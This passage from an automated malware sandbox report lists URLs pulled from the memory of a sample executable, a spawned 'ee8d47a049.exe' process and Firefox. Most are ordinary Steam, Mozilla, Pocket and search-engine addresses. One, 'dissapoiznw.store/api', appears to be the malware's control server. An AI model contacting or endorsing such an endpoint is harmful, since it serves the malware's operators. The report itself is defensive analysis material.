0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2993784315.0000000001102000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967613756.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958718238.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DN
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883867156.00000000010D0000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883770636.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883971948.00000000010D1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222017745.000000000069B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.000000000068E000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: file.exe, 00000000.00000003.2208311275.000000000069F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199513745.0000000000694000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2897844362.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883437222.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883741777.0000000001105000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2958289959.0000000001109000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883909794.0000000001113000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: ee8d47a049.exe, 0000000C.00000003.2883941944.0000000001106000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011CA000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000003.3034566533.00000000011C3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: firefox.exe, 0000001C.00000003.3086576569.000002682E253000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3222736254.000002682D870000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.3083238118.000002682E000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3085509496.000002682E210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: file.exe, 00000000.00000003.2249981893.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2926652624.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2249981893.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2926652624.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B62E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001C.00000002.3272907510.0000026832041000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001C.00000002.3201171185.000002681E130000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp, firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsCom
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: ee8d47a049.exe, 0000000E.00000003.3035132023.0000000001155000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000E.00000002.3053059022.0000000001155000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dissapoiznw.store:443/api
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3290440543.00003793D3B04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001C.00000003.3086576569.000002682E253000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3226653609.000002682E16D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3222736254.000002682D870000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.3083238118.000002682E000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3289437313.00001DD6C1B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3085509496.000002682E210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000003.2222905597.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2223063752.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222836182.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899443498.0000000005841000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898618121.0000000005844000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898704661.0000000005841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2222905597.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2223063752.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222836182.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899443498.0000000005841000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898618121.0000000005844000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898704661.0000000005841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2222905597.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2223063752.00000000053F8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222836182.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2899443498.0000000005841000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898618121.0000000005844000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2898704661.0000000005841000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001C.00000002.3290440543.00003793D3B04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ebay.comP
Source: firefox.exe, 0000001C.00000002.3222889062.000002682D989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://fb.me/react-polyfillsO
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://fb.me/react-polyfillsP
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://fb.me/react-polyfillsPO
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/browser/components/newtab/content-src/asrouter/docs/debuggin
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/nimbus-desktop-experiments
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1Sending
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1i#
Source: firefox.exe, 0000001C.00000002.3211863654.000002682A703000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A824000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://getpocket.com/
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://getpocket.com/a4
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://getpocket.com/collections
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://getpocket.com/explore/
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtabL
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtabC
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtabA
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtabE
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtabG
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab?
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtabN
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabL
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabresource://activity-stream/lib/ActivityStreamSt
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtabI
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001C.00000002.3275031797.0000026832108000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more/
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morechrome://global/skin/icons/pocket.svg
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreresource://nimbus/ExperimentAPI.sys.mjs
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://getpocket.com/read/$
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp, firefox.exe, 0000001C.00000002.3216509308.000002682B603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsNumber
Source: firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS
Source: firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsS7
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3271841943.0000026831F28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=basic
Source: firefox.exe, 0000001C.00000002.3220331573.000002682B803000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001C.00000002.3275406408.0000026832214000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3222736254.000002682D870000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.3083238118.000002682E000000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.3085509496.000002682E210000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotshttps://screenshots.firefox.com/
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporter
Source: firefox.exe, 0000001C.00000002.3242551338.000002682F83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla/webcompat-reporterresource://search-extensions/amazondotcom/Wikipedija
Source: firefox.exe, 0000001C.00000002.3213984029.000002682A900000.00000002.00000001.00040000.0000001F.sdmp String found in binary or memory: https://github.com/projectfluent/fluent.js/wiki/React-Overlays.
Source: firefox.exe, 0000001C.00000002.3213139863.000002682A824000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 0000001C.00000002.3216509308.000002682B664000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3290440543.00003793D3B04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
